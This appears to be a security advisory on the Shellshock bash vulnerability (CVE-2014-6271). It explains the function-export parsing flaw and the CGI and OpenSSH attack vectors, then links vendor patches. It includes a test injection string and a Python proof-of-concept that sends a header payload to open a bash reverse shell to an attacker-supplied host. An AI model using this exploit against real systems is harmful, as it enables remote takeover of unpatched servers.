The technical details of the vulnerability follow.
Bash supports exporting not just shell variables, but also shell
functions to other bash instances, via the process environment to
(indirect) child processes. Current bash versions use an environment
variable named by the function name, and a function definition
starting with “() {” in the variable value to propagate function
definitions through the environment. The vulnerability occurs because
bash does not stop after processing the function definition; it
continues to parse and execute shell commands following the function
definition. For example, an environment variable setting of
VAR=() { ignored; }; /bin/id
will execute /bin/id when the environment is imported into the bash
process. (The process is in a slightly undefined state at this point.
The PATH variable may not have been set up yet, and bash could crash
after executing /bin/id, but the damage has already happened at this
point.)
The fact that an environment variable with an arbitrary name can be
used as a carrier for a malicious function definition containing
trailing commands makes this vulnerability particularly severe; it
enables network-based exploitation.
So far, HTTP requests to CGI scripts have been identified as the major
attack vector.
A typical HTTP request looks like this:
GET /path?query-param-name=query-param-value HTTP/1.1
Host:
www.example.com
Custom: custom-header-value
The CGI specification maps all parts to environment variables. With
Apache httpd, the magic string “() {” can appear in these places:
* Host (“
www.example.com”, as REMOTE_HOST)
* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)
* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)
The user name embedded in an Authorization header could be a vector as
well, but the corresponding REMOTE_USER variable is only set if the
user name corresponds to a known account according to the
authentication configuration, and a configuration which accepts the
magic string appears somewhat unlikely.
In addition, with other CGI implementations, the request method
(“GET”), path (“/path”) and query string
(“query-param-name=query-param-value”) may be vectors, and it is
conceivable for “query-param-value” as well, and perhaps even
“query-param-name”.
The other vector is OpenSSH, either through AcceptEnv variables, TERM
or SSH_ORIGINAL_COMMAND.
Other vectors involving different environment variable set by
additional programs are expected.
Again, please do not disclose this issue to customers or the general
public until the embargo has expired.
Proof-of-concept code
#
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
BASH BUG PATCH
You are recommended to disable any CGI scripts that call on the shell, but it does not fully mitigate the vulnerability. Many of the major operating system and Linux distribution vendors have released the new bash software versions today, including:
Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7) -
http://lists.centos.org/pipermail/centos/2014-September/146099.html
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS -http://www.ubuntu.com/usn/usn-2362-1/
Debian -
https://lists.debian.org/debian-security-announce/2014/msg00220.html
If your system is vulnerable to bash bug, then you are highly recommended to upgrade your bash software package as soon as possible.
